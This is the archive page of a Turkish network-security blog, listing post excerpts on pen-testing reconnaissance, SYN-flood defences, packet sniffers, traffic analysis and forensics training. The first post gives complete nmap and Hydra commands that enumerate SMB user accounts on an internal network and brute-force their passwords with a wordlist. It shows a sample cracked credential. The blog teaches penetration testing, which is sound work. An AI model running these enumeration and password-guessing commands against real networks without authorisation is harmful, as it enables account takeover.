arşiv

‘Network Analyze’ kategorisi için arşiv

İç Ağda Kullanıcı Hesaplarını Belirleme

Pazartesi, 16 Oca 2012 yorum yok

İç ağ testlerinde gerçekleştilen testlerden bir tanesi de ağda ilgili kullanıcı isimlerinin belirlenmesi olmaktadır. Bu işlem Nmap ile gerçekleştirilebilmektedir. 192.168.1.0 ağı için bu adımın gerçekleştirilmesi aşağıdaki şekilde olmaktadır.

Öncelikle aktif ip adreslerinin tespit edilmesi gerekmektedi, bunun için;

# nmap -p139,445 -n 192.168.1.1-254 --open | grep  -B3 "open" | grep -E 
"[0-9]+\.[0-9]+\.[0-9]+\." | awk '{print $5}' > ipler.txt
# nmap -p139,445 -n 192.168.1.1-254 --script=smb-enum-users
-iL ipler.txt > nmap-users.txt

Bu işlemlerin ardından dosya içerisinden kullanıcı isimleri  temin edilmelidir.

# cat nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d
"\\" -f2 |cut -d"(" -f1 |sed 's/.$//'|sed -e 's/\(.* \)/\L\1/' " sort -rn | uniq > usernames.txt

Görüldüğü gibi kullanıcı isimleri ve aktif olan ip adresleri tespit edilmektedir. Bundan sonraki adım sözlük saldırısı ile bu kullanıcıların parola bilgilerinin elde edilmesi olacaktır. Bunun için hydra veya alternatif yazılımlar kullanılabilir. Hydra ile bu işlem aşağıdaki şekilde gerçekleştirilmektedir.

# hydra -M ipler.txt smbnt -s445 -L usernames.txt -P
passwd_file.txt -t1 -e n -m D > sonuc.txt

passwd_file.txt dosyası sözlük saldırısı için kullanılacak olan sözlüğü belirtmektedir. sonuc.txt dosyası içerisinden başarılı olan denemeler aşağıdaki gibi görülmektedir.

# cat sonuc.txt  | grep "\[smb\]" | awk '{print $3,$5,$7}'
192.168.1.37 ahmet.mehmet test37

Görüldüğü gibi başarılı olarak sonuçlanan kullanıcı adı/parola bilgisi yukarıdaki gibi olmaktadır.

Ömer ALBAYRAK

İlgili diğer yazılar:

Syn Cookie/Syn Proxy Kullanan Sistemleri Belirleme

Çarşamba, 22 Haz 2011 yorum yok

Günümüz DDoS saldırılarında en sık tercih edilen yöntemlerden biri SYN flood saldırılarıdır. Bu saldırı tipinde amaç hedef sistemin yarı açık bağlantı limitlerini zorlayarak hizmet veremez hale getirilmesidir. Önlem alınmayan bir sisteme yönelik gönderilecek  ortalama 2000-30000 SYN paketi ile  hedef sistem servis veremez hale getirilebilir.

Güvenlik sektöründe bu saldırıyı engellemek amacıyla iki temel yöntem geliştirilmiştir*: Syn cookie ve syn proxy. Her iki yöntemde de amaç kaynağı doğrulanmamış SYN paketlerinin korunaklı sisteme ulaştırılmamasıdır. Yani öndeki sistem (Firewall/IPS, DDoS engelleme sistemi, Load balancer vs) gelen her SYN paketi için geriye bir adet SYN paketi göndererek son ACK paketinin gelmesini bekler.

 

Son ACK paketi gelmezse gönderici sahte ip adresindendir diyerek sistemden kaynak ayırmaz, son ACK paketi gelirse aradan çekilerek arkadaki sisteme paketleri iletmeye başlar. devamını oku…

İlgili diğer yazılar:

İzinsiz Sanal Bilgisayarları Bulma

Perşembe, 16 Haz 2011 yorum yok

İzinsiz sanal bilgisayarlar (virtual machines) kurumlar için ciddir bir risk taşımaktadır. Sistem yöneticileriniz her ne kadar kurum ağını iyi kontrol ediyor olursa olsunlar izinsiz sanal bilgisayarlar ağınızda olabilir. Bu izinsiz sanal bilgisayarları azaltmanın bazı yolları yazılım politikasını değiştirmek, yönetici hesaplarını sadece gerekli çalışanlara vermektir.

Peki ağınızda hali hazırda duran izinsiz sanal makineleri nasıl tespit edeceksiniz? devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

RawCAP Windows Komut Satırı Sniffer Aracı

Perşembe, 14 Nis 2011 yorum yok
RawCAP, windows sistemlerde komut satırından çalışan ücretsiz bir raw paket yakalama aracıdır.Özellikleri
  • Herhangi bir ağ arabirimini ve IP adresini dinleyebilir buna 127.0.0.1 (localhost/loopback) dahil
  • RawCap.exe sadece 17 kb
  • Çalışmak için herhangi bir dış kütüphaneye veya DLL dosyalarıan ihtiyaç duymaz. .Net 2.0 yeterlidir.
  • Kurulum gerektirmez, rawcap.exe komut satırından tetiklemeniz yeterli olur.
  • Minimum RAM ve CPU tüketir
  • Güvenilir ve kullanımı kolay

Kullanımı

Kullanımı oldukça basit, örnek bir kullanım;

 

IP adresine ait bağlantıları kaydetmek

 

Kaynak

http://www.netresec.com/?page=RawCap

Alternatif Araçlar

http://www.winpcap.org/windump/

Yazar: Ozan UÇAR

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

Bilgisayar Ağlarında Adli Bilişim Analizi Eğitimi 23-26 Şubat 2011

Çarşamba, 09 Şub 2011 yorum yok

Bilgisayar Ağlarında Adli Bilişim Analizi(Network Forensics) Eğitimi

Detay bilgi http://www.bga.com.tr/bilgisayar-aglarinda-adli-bilisim-analizi-egitimi-23-26-subat-2011/

Eğitim Tarihleri 23-26 Şubat  2011
Eğitim Adresi Mahir İz cad.Detay İş Merkezi. CapitolAVM karşısı.B Blok No:19/2 Altunizade-Üsküdar-İstanbul
Kayıt Olun Lütfen bilgi@bga.com.tr adresine e-posta gönderiniz. devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:
Categories: Duyurular, Forensics, Network Analyze Tags:

Herkese Açık Ortamlarda Paylaşım Amaçlı Paket Maskeleme/anonimleştirme

Çarşamba, 05 Oca 2011 yorum yok

Zaman zaman çeşitli ağ ve güvenlik sorunlarının çözümü için firmalara, danışmanlara, e-posta listelerine kaydedilmiş trafik dosyaları göndermek gerekebiliyor. Bu trafik dosyaları şirket/kurum için özel bilgileri barındırabileceği için olduğu gibi göndermek yerine maskeleme, anonimleştirme işlemine tabi tutulmalıdır.

devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:
Categories: Forensics, Network Analyze Tags:

ARGUS kullanarak ağ trafik denetimi

Pazar, 24 Eki 2010 yorum yok

Argus(Audit Record Generation and Utilization System) ileri seviye network analizi yapan açık kod bir araçtır. İstemci ve sunucu olarak iki ayrı bilesenden oluşur.

Sunucu bileşeni ağ üzerinden yakaladığı  trafiği analiz edip binary olarak kaydeder veya doğrudan istemci bileşenine aktarabilir. devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:

Penetrasyon Testlerinde Pasif Bilgi Toplama

Pazartesi, 23 Ağu 2010 yorum yok

Yazar: Onur ŞALK

Pasif bilgi toplama penetrasyon testlerinde bilgi toplama bölümünün ilk adımını teşkil etmektedir.

Pasif bilgi toplamada kurum ile ilgili tüm bilgiler internet üzerinden kuruma ait sistem ve sunuculara erişmeden toplanmaya çalışılır.

İnternet üzerindeki bilgi toplanacak kaynaklara kısaca bakacak olursak:

- Whois, DNS sorgularını yapabileceğimiz ve pasif bilgi toplamak için kullanılan özel web sayfaları

- Arşiv Siteleri ( archieve.org )

- Arama motorları (Google, Bing, Yahoo vs.)

- Sosyal paylaşım ağları (Twitter, Facebook, Linkedin, Friendfeed vs.)

- Bloglar ve tartışma forumları

- Kariyer siteleri

Yukarıda bahsettiğimiz kaynakları detaylı olarak inceleyecek olursak: devamını oku…

İlgili diğer yazılar:

Penetrasyon Testlerinde Aktif Bilgi Toplama

Cuma, 20 Ağu 2010 yorum yok

Yazar:Veysel GÜNDOĞDU

Penetrasyon testlerinden bilgi toplamanın ikinci adımı aktif bilgi toplama işlemidir, bu adım pasif bilgi toplama işleminden sonra gelmektedir. Pasif bilgi toplama işlemi ile kurumun ip ve servis bilgilerinin bir çoğu keşfedilirve  aktif bilgi toplamada ise keşfedilen ip ve servisler üzerinden özel araçlar ve yöntemler ile tarama işlemi gerçekleştirilir. Aktif bilgi toplama işleminde test edilecek sistemler ile temas sağlanır ve bu temas kurumun güvenlik uzmanlarınca  güvenlik cihazları loglarında tespit edilebilinir, en basitinden bir ip adresine yapılacak tarama firewall loglarına düşecektir.

Aktif bilgi toplama ile neler elde edilebilir?


DNS SORGULARI: Yapılacak detaylı DNS sorguları ile kuruma ait ip adresleri ve servisler tespi edilebilir ( DNS Sorgu tipleri A, MX, NS, PTR şeklinde gider ) . DNS UDP port 53 üzerinden sorgu mantığı ile çalışır. DIG veya NSLOOKUP araçları ile DNS sorguları yapılabilmektedir. NSLOOKUP Windows, DIG ise Linux ortaamında çalışır. DIG NSLOOKUP ‘dan daha gelişmiş özelliklere sahiptir.

DNS VERSİYON BİLGİSİ: DNS versiyon bilgilsi çok önemli bir kavramdır, zira DNS sunucusu üzerinde olabilecek bir zaafiyetle, DNS kayıtları manipüle edilebilir veya Dns sunucusu servis dışı bırakılabilir. DIG, NMAP ve NETCAT aracı ile DNS sunucusunun versiyon bilgisi alınabilir. devamını oku…

İlgili diğer yazılar:

SSLdump Kullanarak HTTPS Trafiği Analizi

Salı, 13 Tem 2010 yorum yok

SSLdump SSL/TLS kullanılarak şifrelenmiş trafikler için geliştirilmiş trafik analizi ve şifre çözümleme aracıdır. SSLdump kullanarak -sunucuya ait gizli anahtarın elimizde olduğu varsayılıyor-HTPS ve benzeri şifreli trafiklerin içerisinde geçen bilgiler okunabilir. devamını oku…

İlgili diğer yazılar:

  • İlgili yazı bulunamadı:
Categories: Network Analyze Tags: